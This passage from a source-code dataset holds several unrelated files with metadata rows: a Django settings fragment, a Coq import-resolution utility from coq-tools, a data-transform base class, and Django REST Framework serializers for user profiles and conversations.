'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'ldapdb',
'examples',
'django.contrib.admin',
)
| bsd-2-clause | 2,770,507,173,983,944,000 | 29.714286 | 79 | 0.654651 | false |
JasonGross/coq-tools | import_util.py | 1 | 28530 | from __future__ import with_statement, print_function
import os, subprocess, re, sys, glob, os.path, tempfile, time
from functools import cmp_to_key
from memoize import memoize
from coq_version import get_coqc_help, get_coq_accepts_o, group_coq_args_split_recognized, coq_makefile_supports_arg
from custom_arguments import DEFAULT_VERBOSITY, DEFAULT_LOG
from util import cmp_compat as cmp
import util
__all__ = ["filename_of_lib", "lib_of_filename", "get_file_as_bytes", "get_file", "make_globs", "get_imports", "norm_libname", "recursively_get_imports", "IMPORT_ABSOLUTIZE_TUPLE", "ALL_ABSOLUTIZE_TUPLE", "absolutize_has_all_constants", "run_recursively_get_imports", "clear_libimport_cache", "get_byte_references_for", "sort_files_by_dependency", "get_recursive_requires", "get_recursive_require_names"]
file_mtimes = {}
file_contents = {}
lib_imports_fast = {}
lib_imports_slow = {}
DEFAULT_LIBNAMES=(('.', 'Top'), )
IMPORT_ABSOLUTIZE_TUPLE = ('lib', )# 'mod')
ALL_ABSOLUTIZE_TUPLE = ('lib', 'proj', 'rec', 'ind', 'constr', 'def', 'syndef', 'class', 'thm', 'lem', 'prf', 'ax', 'inst', 'prfax', 'coind', 'scheme', 'vardef')# , 'mod', 'modtype')
IMPORT_REG = re.compile('^R([0-9]+):([0-9]+) ([^ ]+) <> <> lib$', re.MULTILINE)
IMPORT_LINE_REG = re.compile(r'^\s*(?:Require\s+Import|Require\s+Export|Require|Load\s+Verbose|Load)\s+(.*?)\.(?:\s|$)', re.MULTILINE | re.DOTALL)
def warning(*objs):
print("WARNING: ", *objs, file=sys.stderr)
def error(*objs):
print("ERROR: ", *objs, file=sys.stderr)
def fill_kwargs(kwargs):
rtn = {
'libnames' : DEFAULT_LIBNAMES,
'non_recursive_libnames': tuple(),
'ocaml_dirnames' : tuple(),
'verbose' : DEFAULT_VERBOSITY,
'log' : DEFAULT_LOG,
'coqc' : 'coqc',
'coq_makefile' : 'coq_makefile',
'walk_tree' : True,
'coqc_args' : tuple(),
'inline_coqlib' : None,
}
rtn.update(kwargs)
return rtn
def safe_kwargs(kwargs):
for k, v in list(kwargs.items()):
if isinstance(v, list):
kwargs[k] = tuple(v)
return dict((k, v) for k, v in kwargs.items() if not isinstance(v, dict))
def fix_path(filename):
return filename.replace('\\', '/')
def absolutize_has_all_constants(absolutize_tuple):
'''Returns True if absolutizing the types of things mentioned by the tuple is enough to ensure that we only use absolute names'''
return set(ALL_ABSOLUTIZE_TUPLE).issubset(set(absolutize_tuple))
def libname_with_dot(logical_name):
if logical_name in ("", '""', "''"):
return ""
else:
return logical_name + "."
def clear_libimport_cache(libname):
if libname in lib_imports_fast.keys():
del lib_imports_fast[libname]
if libname in lib_imports_slow.keys():
del lib_imports_slow[libname]
@memoize
def os_walk(top, topdown=True, onerror=None, followlinks=False):
return tuple(os.walk(top, topdown=topdown, onerror=onerror, followlinks=followlinks))
@memoize
def os_path_isfile(filename):
return os.path.isfile(filename)
def filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
for physical_name, logical_name in list(libnames) + list(non_recursive_libnames):
if lib.startswith(libname_with_dot(logical_name)):
cur_lib = lib[len(libname_with_dot(logical_name)):]
cur_lib = os.path.join(physical_name, cur_lib.replace('.', os.sep))
yield fix_path(os.path.relpath(os.path.normpath(cur_lib + ext), '.'))
def local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
# is this the right thing to do?
lib = lib.replace('.', os.sep)
for dirpath, dirname, filenames in os_walk('.', followlinks=True):
filename = os.path.relpath(os.path.normpath(os.path.join(dirpath, lib + ext)), '.')
if os_path_isfile(filename):
yield fix_path(filename)
@memoize
def filename_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
filenames = list(filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
local_filenames = list(local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
existing_filenames = [f for f in filenames if os_path_isfile(f) or os_path_isfile(os.path.splitext(f)[0] + '.v')]
if len(existing_filenames) > 0:
retval = existing_filenames[0]
if len(existing_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(existing_filenames), retval))
return retval
if len(filenames) != 0:
DEFAULT_LOG('WARNING: One or more physical paths match logical path %s, but none of them exist: %s'
% (lib, ', '.join(filenames)))
if len(local_filenames) > 0:
retval = local_filenames[0]
if len(local_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple local physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(local_filenames), retval))
return retval
if len(filenames) > 0:
retval = filenames[0]
if len(filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple non-existent physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(filenames), retval))
return retval
return fix_path(os.path.relpath(os.path.normpath(lib.replace('.', os.sep) + ext), '.'))
def filename_of_lib(lib, ext='.v', **kwargs):
kwargs = fill_kwargs(kwargs)
return filename_of_lib_helper(lib, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), ext=ext)
@memoize
def lib_of_filename_helper(filename, libnames, non_recursive_libnames, exts):
filename = os.path.relpath(os.path.normpath(filename), '.')
for ext in exts:
if filename.endswith(ext):
filename = filename[:-len(ext)]
break
for physical_name, logical_name in ((os.path.relpath(os.path.normpath(phys), '.'), libname_with_dot(logical)) for phys, logical in list(libnames) + list(non_recursive_libnames)):
filename_rel = os.path.relpath(filename, physical_name)
if not filename_rel.startswith('..' + os.sep) and not os.path.isabs(filename_rel):
return (filename, logical_name + filename_rel.replace(os.sep, '.'))
if filename.startswith('..' + os.sep) and not os.path.isabs(filename):
filename = os.path.abspath(filename)
return (filename, filename.replace(os.sep, '.'))
def lib_of_filename(filename, exts=('.v', '.glob'), **kwargs):
kwargs = fill_kwargs(kwargs)
filename, libname = lib_of_filename_helper(filename, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), exts=exts)
# if '.' in filename and kwargs['verbose']:
# # TODO: Do we still need this warning?
# kwargs['log']("WARNING: There is a dot (.) in filename %s; the library conversion probably won't work." % filename)
return libname
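# Round-trip sketch (illustrative; assumes the default ('.', 'Top') mapping and
# that no matching file exists on disk, in which case the first candidate path
# is returned):
#   filename_of_lib('Top.Foo.Bar')   -> 'Foo/Bar.v'
#   lib_of_filename('Foo/Bar.v')     -> 'Top.Foo.Bar'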
def is_local_import(libname, **kwargs):
'''Returns True if libname is an import to a local file that we can discover and include, and False otherwise'''
return os.path.isfile(filename_of_lib(libname, **kwargs))
def get_raw_file_as_bytes(filename, **kwargs):
kwargs = fill_kwargs(kwargs)
if kwargs['verbose']:
filename_extra = '' if os.path.isabs(filename) else ' (%s)' % os.path.abspath(filename)
kwargs['log']('getting %s%s' % (filename, filename_extra))
with open(filename, 'rb') as f:
return f.read()
def get_raw_file(*args, **kwargs):
return util.normalize_newlines(get_raw_file_as_bytes(*args, **kwargs).decode('utf-8'))
# code is string
@memoize
def get_constr_name(code):
first_word = code.split(' ')[0]
last_component = first_word.split('.')[-1]
return last_component
# before, after are both strings
def move_strings_once(before, after, possibility, relaxed=False):
for i in possibility:
if before[-len(i):] == i:
return before[:-len(i)], before[-len(i):] + after
if relaxed: # allow no matches
return before, after
else:
return None, None
# before, after are both strings
def move_strings_pre(before, after, possibility):
while len(before) > 0:
new_before, new_after = move_strings_once(before, after, possibility)
if new_before is None or new_after is None:
return before, after
before, after = new_before, new_after
return (before, after)
# before, after are both strings
def move_function(before, after, get_len):
while len(before) > 0:
n = get_len(before)
if n is None or n <= 0:
return before, after
before, after = before[:-n], before[n:] + after
return before, after
# before, after are both strings
def move_strings(before, after, *possibilities):
for possibility in possibilities:
before, after = move_strings_pre(before, after, possibility)
return before, after
# before, after are both strings
def move_space(before, after):
return move_strings(before, after, '\n\t\r ')
# uses byte locations
def remove_from_require_before(contents, location):
"""removes "From ... " from things like "From ... Require ..." """
assert(contents is bytes(contents))
before, after = contents[:location].decode('utf-8'), contents[location:].decode('utf-8')
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Import', 'Export'), relaxed=True)
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Require',), relaxed=False)
if before is None or after is None: return contents
before, _ = move_space(before, after)
before, _ = move_function(before, after, (lambda b: 1 if b[-1] not in ' \t\r\n' else None))
if before is None: return contents
before, _ = move_space(before, after)
before, _ = move_strings_once(before, after, ('From',), relaxed=False)
if before is None: return contents
return (before + after).encode('utf-8')
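# Example (illustrative): with the byte offset pointing at the start of the
# required library name, the leading "From <prefix>" is dropped while the
# Require itself is preserved:
#   remove_from_require_before(b'From Coq Require Import List.', 24)
#     -> b'Require Import List.'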
# returns locations as bytes
def get_references_from_globs(globs):
all_globs = set((int(start), int(end) + 1, loc, append, ty.strip())
for start, end, loc, append, ty
in re.findall('^R([0-9]+):([0-9]+) ([^ ]+) <> ([^ ]+) ([^ ]+)$', globs, flags=re.MULTILINE))
return tuple(sorted(all_globs, key=(lambda x: x[0]), reverse=True))
# contents should be bytes; globs should be string
def update_with_glob(contents, globs, absolutize, libname, transform_base=(lambda x: x), **kwargs):
assert(contents is bytes(contents))
kwargs = fill_kwargs(kwargs)
for start, end, loc, append, ty in get_references_from_globs(globs):
cur_code = contents[start:end].decode('utf-8')
if ty not in absolutize or loc == libname:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
# sanity check for correct replacement, to skip things like record builder notation
elif append != '<>' and get_constr_name(cur_code) != append:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping invalid %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
else: # ty in absolutize and loc != libname
rep = transform_base(loc) + ('.' + append if append != '<>' else '')
if kwargs['verbose'] == 2: kwargs['log']('Qualifying %s %s to %s' % (ty, cur_code, rep))
if kwargs['verbose'] > 2: kwargs['log']('Qualifying %s %s to %s from R%s:%s %s <> %s %s' % (ty, cur_code, rep, start, end, loc, append, ty))
contents = contents[:start] + rep.encode('utf-8') + contents[end:]
contents = remove_from_require_before(contents, start)
return contents
def get_all_v_files(directory, exclude=tuple()):
all_files = []
exclude = [os.path.normpath(i) for i in exclude]
for dirpath, dirnames, filenames in os.walk(directory):
all_files += [os.path.relpath(name, '.') for name in glob.glob(os.path.join(dirpath, '*.v'))
if os.path.normpath(name) not in exclude]
return tuple(map(fix_path, all_files))
# we want to run on passing arguments if we're running in
# passing/non-passing mode, cf
# https://github.com/JasonGross/coq-tools/issues/57. Hence we return
# the passing version iff passing_coqc is passed
def get_maybe_passing_arg(kwargs, key):
if kwargs.get('passing_coqc'): return kwargs['passing_' + key]
return kwargs[key]
def run_coq_makefile_and_make(v_files, targets, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
f = tempfile.NamedTemporaryFile(suffix='.coq', prefix='Makefile', dir='.', delete=False)
mkfile = os.path.basename(f.name)
f.close()
cmds = [kwargs['coq_makefile'], 'COQC', '=', get_maybe_passing_arg(kwargs, 'coqc'), '-o', mkfile]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
coq_makefile_help = get_coqc_help(kwargs['coq_makefile'], **kwargs)
grouped_args, unrecognized_args = group_coq_args_split_recognized(get_maybe_passing_arg(kwargs, 'coqc_args'), coq_makefile_help, is_coq_makefile=True)
for args in grouped_args:
cmds.extend(args)
if unrecognized_args:
if coq_makefile_supports_arg(coq_makefile_help):
for arg in unrecognized_args:
cmds += ['-arg', arg]
else:
if kwargs['verbose']: kwargs['log']('WARNING: Unrecognized arguments to coq_makefile: %s' % repr(unrecognized_args))
cmds += list(map(fix_path, v_files))
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p_make_makefile = subprocess.Popen(cmds,
stdout=subprocess.PIPE)
(stdout, stderr) = p_make_makefile.communicate()
except OSError as e:
error("When attempting to run coq_makefile:")
error(repr(e))
error("Failed to run coq_makefile using command line:")
error(' '.join(cmds))
error("Perhaps you forgot to add COQBIN to your PATH?")
error("Try running coqc on your files to get .glob files, to work around this.")
sys.exit(1)
if kwargs['verbose']:
kwargs['log'](' '.join(['make', '-k', '-f', mkfile] + targets))
try:
p_make = subprocess.Popen(['make', '-k', '-f', mkfile] + targets, stdin=subprocess.PIPE, stdout=sys.stderr) #, stdout=subprocess.PIPE)
return p_make.communicate()
finally:
for filename in (mkfile, mkfile + '.conf', mkfile + '.d', '.%s.d' % mkfile, '.coqdeps.d'):
if os.path.exists(filename):
os.remove(filename)
def make_one_glob_file(v_file, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
coqc_prog = get_maybe_passing_arg(kwargs, 'coqc')
cmds = [coqc_prog, '-q']
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
cmds += list(get_maybe_passing_arg(kwargs, 'coqc_args'))
v_file_root, ext = os.path.splitext(fix_path(v_file))
o_file = os.path.join(tempfile.gettempdir(), os.path.basename(v_file_root) + '.vo')
if get_coq_accepts_o(coqc_prog, **kwargs):
cmds += ['-o', o_file]
else:
kwargs['log']("WARNING: Clobbering '%s' because coqc does not support -o" % o_file)
cmds += ['-dump-glob', v_file_root + '.glob', v_file_root + ext]
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p = subprocess.Popen(cmds, stdout=subprocess.PIPE)
return p.communicate()
finally:
if os.path.exists(o_file): os.remove(o_file)
def make_globs(logical_names, **kwargs):
kwargs = fill_kwargs(kwargs)
existing_logical_names = [i for i in logical_names
if os.path.isfile(filename_of_lib(i, ext='.v', **kwargs))]
if len(existing_logical_names) == 0: return
filenames_vo_v_glob = [(filename_of_lib(i, ext='.vo', **kwargs), filename_of_lib(i, ext='.v', **kwargs), filename_of_lib(i, ext='.glob', **kwargs)) for i in existing_logical_names]
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.isfile(glob_name) and os.path.getmtime(glob_name) > os.path.getmtime(v_name))]
for vo_name, v_name, glob_name in filenames_vo_v_glob:
if os.path.isfile(glob_name) and not os.path.getmtime(glob_name) > os.path.getmtime(v_name):
os.remove(glob_name)
# if the .vo file already exists and is new enough, we assume
# that all dependent .vo files also exist, and just run coqc
# in a way that doesn't update the .vo file. We use >= rather
# than > because we're using .vo being new enough as a proxy
# for the dependent .vo files existing, so we don't care as
# much about being perfectly accurate on .vo file timing
# (unlike .glob file timing, were we need it to be up to
# date), and it's better to not clobber the .vo file when
# we're unsure if it's new enough.
if os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name):
make_one_glob_file(v_name, **kwargs)
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name))]
filenames_v = [v_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
filenames_glob = [glob_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
if len(filenames_vo_v_glob) == 0: return
extra_filenames_v = (get_all_v_files('.', filenames_v) if kwargs['walk_tree'] else [])
(stdout_make, stderr_make) = run_coq_makefile_and_make(tuple(sorted(list(filenames_v) + list(extra_filenames_v))), filenames_glob, **kwargs)
def get_glob_file_for(filename, update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if update_globs:
if file_mtimes[filename] > time.time():
kwargs['log']("WARNING: The file %s comes from the future! (%d > %d)" % (filename, file_mtimes[filename], time.time()))
if time.time() - file_mtimes[filename] < 2:
if kwargs['verbose']:
kwargs['log']("NOTE: The file %s is very new (%d, %d seconds old), delaying until it's a bit older" % (filename, file_mtimes[filename], time.time() - file_mtimes[filename]))
# delay until the .v file is old enough that a .glob file will be considered newer
# if we just wait until they're not equal, we apparently get issues like https://gitlab.com/Zimmi48/coq/-/jobs/535005442
while time.time() - file_mtimes[filename] < 2:
time.sleep(0.1)
make_globs([libname], **kwargs)
if os.path.isfile(globname):
if os.stat(globname).st_mtime > file_mtimes[filename]:
return get_raw_file(globname, **kwargs)
elif kwargs['verbose']:
kwargs['log']("WARNING: Assuming that %s is not a valid reflection of %s because %s is newer (%d >= %d)" % (globname, filename, filename, file_mtimes[filename], os.stat(globname).st_mtime))
return None
def get_byte_references_for(filename, types, **kwargs):
globs = get_glob_file_for(filename, **kwargs)
if globs is None: return None
references = get_references_from_globs(globs)
return tuple((start, end, loc, append, ty) for start, end, loc, append, ty in references
if types is None or ty in types)
def get_file_as_bytes(filename, absolutize=('lib',), update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if len(absolutize) > 0:
globs = get_glob_file_for(filename, update_globs=update_globs, **kwargs)
if globs is not None:
file_contents[filename] = update_with_glob(file_contents[filename], globs, absolutize, libname, **kwargs)
return file_contents[filename]
# returns string, newlines normalized
def get_file(*args, **kwargs):
return util.normalize_newlines(get_file_as_bytes(*args, **kwargs).decode('utf-8'))
def get_require_dict(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if lib not in lib_imports_slow.keys():
make_globs([lib], **kwargs)
if os.path.isfile(glob_name): # making succeeded
contents = get_raw_file(glob_name, **kwargs)
lines = contents.split('\n')
lib_imports_slow[lib] = {}
for start, end, name in IMPORT_REG.findall(contents):
name = norm_libname(name, **kwargs)
if name not in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = []
lib_imports_slow[lib][name].append((int(start), int(end)))
for name in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = tuple(lib_imports_slow[lib][name])
if lib in lib_imports_slow.keys():
return lib_imports_slow[lib]
return {}
def get_require_names(lib, **kwargs):
return tuple(sorted(get_require_dict(lib, **kwargs).keys()))
def get_require_locations(lib, **kwargs):
return sorted(set(loc for name, locs in get_require_dict(lib, **kwargs).items()
for loc in locs))
def transitively_close(d, make_new_value=(lambda x: tuple()), reflexive=True):
updated = True
while updated:
updated = False
for key in tuple(d.keys()):
newv = set(d[key])
if reflexive: newv.add(key)
for v in tuple(newv):
if v not in d.keys(): d[v] = make_new_value(v)
newv.update(set(d[v]))
if newv != set(d[key]):
d[key] = newv
updated = True
return d
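# Hedged example (not part of the original file): a minimal sanity check of
# transitively_close on a made-up dependency dict; the library names 'A', 'B'
# and 'C' are purely illustrative.
def _example_transitive_closure():
    deps = {'A': ('B',), 'B': ('C',), 'C': tuple()}
    closed = transitively_close(dict(deps), reflexive=True)
    # With reflexive=True every key contains itself, so 'A' closes over A, B and C.
    assert closed['A'] == {'A', 'B', 'C'}
    assert closed['B'] == {'B', 'C'}
    assert closed['C'] == {'C'}
    return closed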
def get_recursive_requires(*libnames, **kwargs):
requires = dict((lib, get_require_names(lib, **kwargs)) for lib in libnames)
transitively_close(requires, make_new_value=(lambda lib: get_require_names(lib, **kwargs)), reflexive=True)
return requires
def get_recursive_require_names(libname, **kwargs):
return tuple(i for i in get_recursive_requires(libname, **kwargs).keys() if i != libname)
def sort_files_by_dependency(filenames, reverse=True, **kwargs):
kwargs = fill_kwargs(kwargs)
filenames = map(fix_path, filenames)
filenames = [(filename + '.v' if filename[-2:] != '.v' else filename) for filename in filenames]
libnames = [lib_of_filename(filename, **kwargs) for filename in filenames]
requires = get_recursive_requires(*libnames, **kwargs)
def fcmp(f1, f2):
if f1 == f2: return cmp(f1, f2)
l1, l2 = lib_of_filename(f1, **kwargs), lib_of_filename(f2, **kwargs)
if l1 == l2: return cmp(f1, f2)
# this only works correctly if the closure is *reflexive* as
# well as transitive, because we require that if A requires B,
# then A must have strictly more requires than B (i.e., it
# must include itself)
if len(requires[l1]) != len(requires[l2]): return cmp(len(requires[l1]), len(requires[l2]))
return cmp(l1, l2)
filenames = sorted(filenames, key=cmp_to_key(fcmp), reverse=reverse)
return filenames
def get_imports(lib, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if not fast:
get_require_dict(lib, **kwargs)
if lib in lib_imports_slow.keys():
return tuple(k for k, v in sorted(lib_imports_slow[lib].items(), key=(lambda kv: kv[1])))
# making globs failed, or we want the fast way, fall back to regexp
if lib not in lib_imports_fast.keys():
contents = get_file(v_name, **kwargs)
imports_string = re.sub('\\s+', ' ', ' '.join(IMPORT_LINE_REG.findall(contents))).strip()
lib_imports_fast[lib] = tuple(sorted(set(norm_libname(i, **kwargs)
for i in imports_string.split(' ') if i != '')))
return lib_imports_fast[lib]
def norm_libname(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = filename_of_lib(lib, **kwargs)
if os.path.isfile(filename):
return lib_of_filename(filename, **kwargs)
else:
return lib
def merge_imports(imports, **kwargs):
kwargs = fill_kwargs(kwargs)
rtn = []
for import_list in imports:
for i in import_list:
if norm_libname(i, **kwargs) not in rtn:
rtn.append(norm_libname(i, **kwargs))
return rtn
# This is a bottleneck for more than around 10,000 lines of code total with many imports (around 100)
@memoize
def internal_recursively_get_imports(lib, **kwargs):
return run_recursively_get_imports(lib, recur=internal_recursively_get_imports, **kwargs)
def recursively_get_imports(lib, **kwargs):
return internal_recursively_get_imports(lib, **safe_kwargs(kwargs))
def run_recursively_get_imports(lib, recur=recursively_get_imports, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if os.path.isfile(v_name):
imports = get_imports(lib, fast=fast, **kwargs)
if kwargs['inline_coqlib'] and 'Coq.Init.Prelude' not in imports:
mykwargs = dict(kwargs)
coqlib_libname = (os.path.join(kwargs['inline_coqlib'], 'theories'), 'Coq')
if coqlib_libname not in mykwargs['libnames']:
mykwargs['libnames'] = tuple(list(kwargs['libnames']) + [coqlib_libname])
try:
coqlib_imports = get_imports('Coq.Init.Prelude', fast=fast, **mykwargs)
if imports and not any(i in imports for i in coqlib_imports):
imports = tuple(list(coqlib_imports) + list(imports))
except IOError as e:
kwargs['log']("WARNING: --inline-coqlib passed, but no Coq.Init.Prelude found on disk.\n Searched in %s\n (Error was: %s)\n\n" % (repr(mykwargs['libnames']), repr(e)))
if not fast: make_globs(imports, **kwargs)
imports_list = [recur(k, fast=fast, **kwargs) for k in imports]
return merge_imports(tuple(map(tuple, imports_list + [[lib]])), **kwargs)
return [lib]
| mit | 1,641,937,864,110,081,000 | 49.052632 | 404 | 0.625096 | false |
mverleg/data_cleaner | controller/base_transform.py | 1 | 3490 |
from copy import deepcopy
from collections import OrderedDict
from misc import load_cls
class BaseTransform():
name = None # default value is the class name
description = 'transforms data'
options = [] # dictionaries with name, type, default and required
class NotInitialized(Exception):
""" Tried to apply a transformation that hasn't learned parameters yet. """
def __init__(self):
"""
Set initial configuration and parameters.
"""
self.conf = {}
for option in self.options:
self.conf[option['name']] = option['default']
self.set_params({})
def get_name(self):
"""
If name is None, get is from the class.
"""
return self.name or self.__class__.__name__.lower()
def __repr__(self):
"""
String representation of instances.
"""
confstr = ','.join('{0:}={1:}'.format(k, v) for k, v in self.conf.items()) or 'noconf'
return '{0:s}:{1:s}'.format(self.get_name().replace(' ', '_'), confstr)
def learn(self, row):
"""
Learn any parameters from the data.
:param row: The data row to learn from.
"""
def do(self, row):
"""
Apply the transformation on the given row(s).
:param data: Iterable of equal-length numpy 1D data arrays.
:return: Collection of transformed equal-length numpy 1D data arrays.
"""
return row
def get_conf(self):
"""
:return: JSON-able dictionary containing configuration options.
"""
return deepcopy(self.conf)
def set_conf(self, input):
"""
Update configuration.
        :param input: A JSON-able dictionary containing configuration options.
Works for empty dictionary (set defaults). Rejects invalid configurations.
"""
option_names = [option['name'] for option in self.options]
for name, value in input.items():
assert name in option_names, 'Unknown option "{0:s}" for "{1:s}"; accepted options are "{2:s}"'.format(name, type(self), '", "'.join(option_names))
#todo: check/cast default types
def get_params(self):
"""
:return: JSON-able dictionary containing learned parameters.
"""
return deepcopy(self.params)
def set_params(self, input):
"""
Set parameters to previously learned ones, resetting any existing ones.
        :param input: A JSON-able dictionary containing parameters.
There is less error checking here than for configuration, since this data is supposed to come directly from this class.
"""
self.params = deepcopy(input)
def to_json(self):
"""
An encoder, converting this instance to JSON-able primary types.
:return: A dictionary representing this instance.
"""
pypath = '{0:s}.{1:s}'.format(self.__class__.__module__, self.__class__.__name__)
return OrderedDict([
('transformation', pypath),
('conf', self.get_conf()),
('params', self.get_params()),
])
@classmethod
def from_json(cls, di):
"""
A constructor/decoder to create instances from primary types (JSON-serializable ones), as created by to_json().
:param str: A dictionary representing the transform instance.
:return: An instance of the appropriate transform with the loaded attributes.
"""
for key in di.keys():
assert key in ('transformation', 'conf', 'params',), 'unknown transform property {0:s}'.format(key)
assert 'transformation' in di, 'type of transformation not found (should have \'transformation\': pythonpath)'
Trns = load_cls(di['transformation'])
trns = Trns()
if 'conf' in di:
trns.set_conf(di['conf'])
if 'params' in di:
trns.set_params(di['params'])
return trns
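# Hedged usage sketch (not part of the original module): a minimal subclass
# showing the configuration/serialization round trip.  The transform and its
# "factor" option are invented for illustration; from_json() would additionally
# need this class to be importable via the python path stored in to_json().
class ExampleScaleTransform(BaseTransform):
    description = 'multiplies data by a constant factor'
    options = [{'name': 'factor', 'type': float, 'default': 1.0, 'required': False}]
def _example_round_trip():
    trns = ExampleScaleTransform()
    encoded = trns.to_json()   # OrderedDict with 'transformation', 'conf' and 'params'
    return encoded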
| mit | 7,570,391,018,442,940,000 | 27.842975 | 150 | 0.675645 | false |
RUBi-ZA/JMS | src/users/serializers.py | 2 | 2766 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from users.models import *
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','email','first_name','id','last_login','last_name','username')
class GroupUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('id','username')
class GroupSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
class Meta:
model = Group
fields = ('id', 'name', 'user_set')
class UserProfileSerializer(serializers.ModelSerializer):
user = UserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class UserProfileNameSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = UserProfile
fields = ('user',)
class ContactUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','first_name','id','last_name','username')
class ContactProfileSerializer(serializers.ModelSerializer):
user = ContactUserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class ContactSerializer(serializers.ModelSerializer):
ContactProfile = ContactProfileSerializer()
class Meta:
model = Contact
class MessageSerializer(serializers.ModelSerializer):
UserProfile = UserProfileNameSerializer()
class Meta:
model = Message
fields = ('MessageID', 'Content', 'Date', 'UserProfile')
class UserConversationSerializer(serializers.ModelSerializer):
UserProfile = UserProfileSerializer()
class Meta:
model = UserConversation
class FullConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
Messages = MessageSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations', 'Messages')
class ConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations')
class GroupConversationSerializer(serializers.ModelSerializer):
Conversation = FullConversationSerializer()
class Meta:
model = GroupConversation
fields = ('Conversation',)
class GroupDetailSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
